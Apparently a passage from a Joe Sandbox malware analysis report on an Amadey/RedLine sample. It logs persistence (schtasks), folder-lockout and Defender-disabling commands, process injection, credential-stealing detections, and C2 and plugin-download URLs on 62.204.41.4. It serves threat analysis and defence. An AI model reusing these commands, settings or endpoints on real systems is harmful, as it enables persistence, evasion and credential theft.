                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040CE09
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040E61C
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00416F6A
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_004123F1 SetUnhandledExceptionFilter,2_2_004123F1
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FD71D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_01FD71D1
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FCE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_01FCE883
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FCD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_01FCD070
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: 2_2_01FD2658 SetUnhandledExceptionFilter,2_2_01FD2658
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_00187A74 SetUnhandledExceptionFilter,8_2_00187A74
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0018790F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0018790F
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_00187208 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00187208
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_0018BB20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_0018BB20

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_001738C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,8_2_001738C0
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeProcess created: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /FJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&ExitJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, MainJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:N"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "mnolyk.exe" /P "user:R" /EJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:N"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\4b9a106e76" /P "user:R" /EJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C18A3 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,0_2_010C18A3
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: GetLocaleInfoA,2_2_00417A20
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeCode function: GetLocaleInfoA,2_2_01FD7C87
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exeQueries volume information: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll VolumeInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_00187AFC cpuid 8_2_00187AFC
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C7176 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_010C7176
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exeCode function: 8_2_00193C76 _free,_free,_free,GetTimeZoneInformation,_free,8_2_00193C76
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exeCode function: 7_2_00007FF9A793077D GetUserNameA,7_2_00007FF9A793077D
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010C2BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_010C2BFB

                          Lowering of HIPS / PFW / Operating System Security Settings

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1Jump to behavior

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 2.2.ajAf.exe.1fc0e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.ajAf.exe.1ff0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.ajAf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.ajAf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Source: Yara matchFile source: 9.2.mnolyk.exe.d80000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.file.exe.4aa7620.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.2.xriv.exe.170000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.mnolyk.exe.d80000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 8.0.xriv.exe.170000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 9.0.mnolyk.exe.d80000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.0.mnolyk.exe.d80000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.3.file.exe.4aa7620.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000009.00000002.827977648.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000000.443338469.0000000000171000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.307249151.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.445406570.0000000000171000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000000.445122215.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.452140965.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000000.451650195.0000000000D81000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, type: DROPPED
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Source: Yara matchFile source: 00000009.00000002.827863468.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.827863468.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.581791427.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.827863468.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.581742963.0000000000A72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000003.581742963.0000000000A86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000009.00000002.827863468.0000000000A39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 20.2.rundll32.exe.6e7e0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, type: DROPPED
                          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 2.2.ajAf.exe.1fc0e67.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.3.ajAf.exe.1ff0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.ajAf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 2.2.ajAf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000003.390341867.0000000001FF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts3
                          Native API
                          1
                          Windows Service
                          2
                          Bypass User Access Control
                          21
                          Disable or Modify Tools
                          OS Credential Dumping2
                          System Time Discovery
                          Remote Services1
                          Archive Collected Data
                          Exfiltration Over Other Network Medium14
                          Ingress Tool Transfer
                          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                          System Shutdown/Reboot
                          Default Accounts2
                          Command and Scripting Interpreter
                          1
                          Scheduled Task/Job
                          1
                          Access Token Manipulation
                          1
                          Deobfuscate/Decode Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                          Encrypted Channel
                          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain Accounts1
                          Scheduled Task/Job
                          1
                          Registry Run Keys / Startup Folder
                          1
                          Windows Service
                          2
                          Obfuscated Files or Information
                          Security Account Manager2
                          File and Directory Discovery
                          SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                          Non-Application Layer Protocol
                          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local Accounts1
                          Service Execution
                          1
                          Services File Permissions Weakness
                          111
                          Process Injection
                          2
                          Software Packing
                          NTDS36
                          System Information Discovery
                          Distributed Component Object ModelInput CaptureScheduled Transfer113
                          Application Layer Protocol
                          SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsCronNetwork Logon Script1
                          Scheduled Task/Job
                          1
                          Timestomp
                          LSA Secrets13
                          Security Software Discovery
                          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.common1
                          Registry Run Keys / Startup Folder
                          2
                          Bypass User Access Control
                          Cached Domain Credentials21
                          Virtualization/Sandbox Evasion
                          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup Items1
                          Services File Permissions Weakness
                          1
                          Masquerading
                          DCSync2
                          Process Discovery
                          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job21
                          Virtualization/Sandbox Evasion
                          Proc Filesystem1
                          System Owner/User Discovery
                          Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                          Access Token Manipulation
                          /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)111
                          Process Injection
                          Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
                          Services File Permissions Weakness
                          Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchd1
                          Rundll32
                          KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 signatures2 2 Behavior Graph ID: 799407 Sample: file.exe Startdate: 06/02/2023 Architecture: WINDOWS Score: 100 65 Snort IDS alert for network traffic 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 Antivirus detection for URL or domain 2->69 71 8 other signatures 2->71 9 file.exe 1 4 2->9         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        16 mnolyk.exe 2->16         started        process3 file4 55 C:\Users\user\AppData\Local\Temp\...\xriv.exe, PE32 9->55 dropped 57 C:\Users\user\AppData\Local\Temp\...\bjAg.exe, PE32 9->57 dropped 18 bjAg.exe 1 4 9->18         started        22 xriv.exe 3 9->22         started        process5 file6 49 C:\Users\user\AppData\Local\Temp\...\nika.exe, PE32 18->49 dropped 51 C:\Users\user\AppData\Local\Temp\...\ajAf.exe, PE32 18->51 dropped 73 Multi AV Scanner detection for dropped file 18->73 75 Machine Learning detection for dropped file 18->75 24 ajAf.exe 9 1 18->24         started        27 nika.exe 1 1 18->27         started        53 C:\Users\user\AppData\Local\...\mnolyk.exe, PE32 22->53 dropped 77 Contains functionality to inject code into remote processes 22->77 29 mnolyk.exe 18 22->29         started        signatures7 process8 dnsIp9 79 Detected unpacking (changes PE section rights) 24->79 81 Detected unpacking (overwrites its own PE header) 24->81 83 Disable Windows Defender notifications (registry) 24->83 85 Disable Windows Defender real time protection (registry) 24->85 63 62.204.41.4, 49690, 49691, 49692 TNNET-ASTNNetOyMainnetworkFI United Kingdom 29->63 59 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 29->59 dropped 61 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 29->61 dropped 87 Multi AV Scanner detection for dropped file 29->87 89 Creates an undocumented autostart registry key 29->89 91 Machine Learning detection for dropped file 29->91 93 Uses schtasks.exe or at.exe to add and modify task schedules 29->93 33 cmd.exe 1 29->33         started        35 schtasks.exe 1 29->35         started        37 rundll32.exe 29->37         started        file10 signatures11 process12 process13 39 conhost.exe 33->39         started        41 cmd.exe 1 33->41         started        43 cmd.exe 1 33->43         started        47 4 other processes 33->47 45 conhost.exe 35->45         started       

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          file.exe67%ReversingLabsWin32.Trojan.Amadey
                          file.exe100%Joe Sandbox ML
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll81%ReversingLabsWin32.Trojan.Amadey
                          C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe81%ReversingLabsWin32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\bjAg.exe51%ReversingLabsWin32.Trojan.Tedy
                          C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe81%ReversingLabsWin32.Spyware.RedLine
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe39%ReversingLabsWin32.Ransomware.Stop
                          C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe82%ReversingLabsByteCode-MSIL.Trojan.Disabler
                          C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll81%ReversingLabsWin32.Trojan.Amadey
                          No Antivirus matches
                          No Antivirus matches
                          SourceDetectionScannerLabelLink
                          http://62.204.41.4/Gol478Ns/index.php0%Avira URL Cloudsafe
                          http://62.204.41.4/Gol478Ns/Plugins/cred64.dll0%Avira URL Cloudsafe
                          62.204.41.4/Gol478Ns/index.php0%Avira URL Cloudsafe
                          http://62.204.41.4/Gol478Ns/Plugins/clip64.dll100%Avira URL Cloudmalware
                          No contacted domains info
                          NameMaliciousAntivirus DetectionReputation
                          http://62.204.41.4/Gol478Ns/Plugins/cred64.dlltrue
                          • Avira URL Cloud: safe
                          unknown
                          http://62.204.41.4/Gol478Ns/Plugins/clip64.dlltrue
                          • Avira URL Cloud: malware
                          unknown
                          62.204.41.4/Gol478Ns/index.phptrue
                          • Avira URL Cloud: safe
                          low
                          http://62.204.41.4/Gol478Ns/index.phptrue
                          • Avira URL Cloud: safe
                          unknown
                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs
                          IPDomainCountryFlagASNASN NameMalicious
                          62.204.41.4
                          unknownUnited Kingdom
                          30798TNNET-ASTNNetOyMainnetworkFItrue
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:799407
                          Start date and time:2023-02-06 14:14:23 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 13m 0s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:23
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample file name:file.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@34/14@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HDC Information:
                          • Successful, ratio: 41.3% (good quality ratio 39.6%)
                          • Quality average: 84.9%
                          • Quality standard deviation: 24.3%
                          HCA Information:
                          • Successful, ratio: 93%
                          • Number of executed functions: 100
                          • Number of non-executed functions: 138
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240s for rundll32
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
                          • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                          • Not all processes where analyzed, report is missing behavior information
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing behavior information.
                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: file.exe
                          TimeTypeDescription
                          14:16:28API Interceptor2034x Sleep call for process: mnolyk.exe modified
                          14:16:29Task SchedulerRun new task: mnolyk.exe path: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          62.204.41.4file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          QEb6ybdVBd.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          9U2j7fIA6J.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4/Gol478Ns/index.php
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          TNNET-ASTNNetOyMainnetworkFId5Mz8LcQ40.exeGet hashmaliciousBrowse
                          • 62.204.41.5
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          4tZ5R2O8ru.exeGet hashmaliciousBrowse
                          • 62.204.41.5
                          Z7MMw0PTfb.exeGet hashmaliciousBrowse
                          • 62.204.41.5
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          cGvwe523RO.exeGet hashmaliciousBrowse
                          • 62.204.41.170
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          9Nn6GvGMz1.exeGet hashmaliciousBrowse
                          • 62.204.41.170
                          07wuYH0G0l.exeGet hashmaliciousBrowse
                          • 62.204.41.170
                          ekFLwb11nN.exeGet hashmaliciousBrowse
                          • 62.204.41.170
                          AGjUlMBhkD.exeGet hashmaliciousBrowse
                          • 62.204.41.5
                          ljzIqZX3B5.exeGet hashmaliciousBrowse
                          • 62.204.41.170
                          Zd6uw4sOLV.exeGet hashmaliciousBrowse
                          • 62.204.41.5
                          89iZUBE2nX.exeGet hashmaliciousBrowse
                          • 62.204.41.170
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          file.exeGet hashmaliciousBrowse
                          • 62.204.41.4
                          No context
                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dllfile.exeGet hashmaliciousBrowse
                            file.exeGet hashmaliciousBrowse
                              file.exeGet hashmaliciousBrowse
                                file.exeGet hashmaliciousBrowse
                                  file.exeGet hashmaliciousBrowse
                                    file.exeGet hashmaliciousBrowse
                                      file.exeGet hashmaliciousBrowse
                                        file.exeGet hashmaliciousBrowse
                                          file.exeGet hashmaliciousBrowse
                                            file.exeGet hashmaliciousBrowse
                                              file.exeGet hashmaliciousBrowse
                                                QEb6ybdVBd.exeGet hashmaliciousBrowse
                                                  9U2j7fIA6J.exeGet hashmaliciousBrowse
                                                    file.exeGet hashmaliciousBrowse
                                                      file.exeGet hashmaliciousBrowse
                                                        Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                        File Type:CSV text
                                                        Category:dropped
                                                        Size (bytes):226
                                                        Entropy (8bit):5.354940450065058
                                                        Encrypted:false
                                                        SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
                                                        MD5:B10E37251C5B495643F331DB2EEC3394
                                                        SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
                                                        SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
                                                        SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
                                                        Malicious:false
                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
                                                        Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\ajAf.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):321
                                                        Entropy (8bit):5.355221377978991
                                                        Encrypted:false
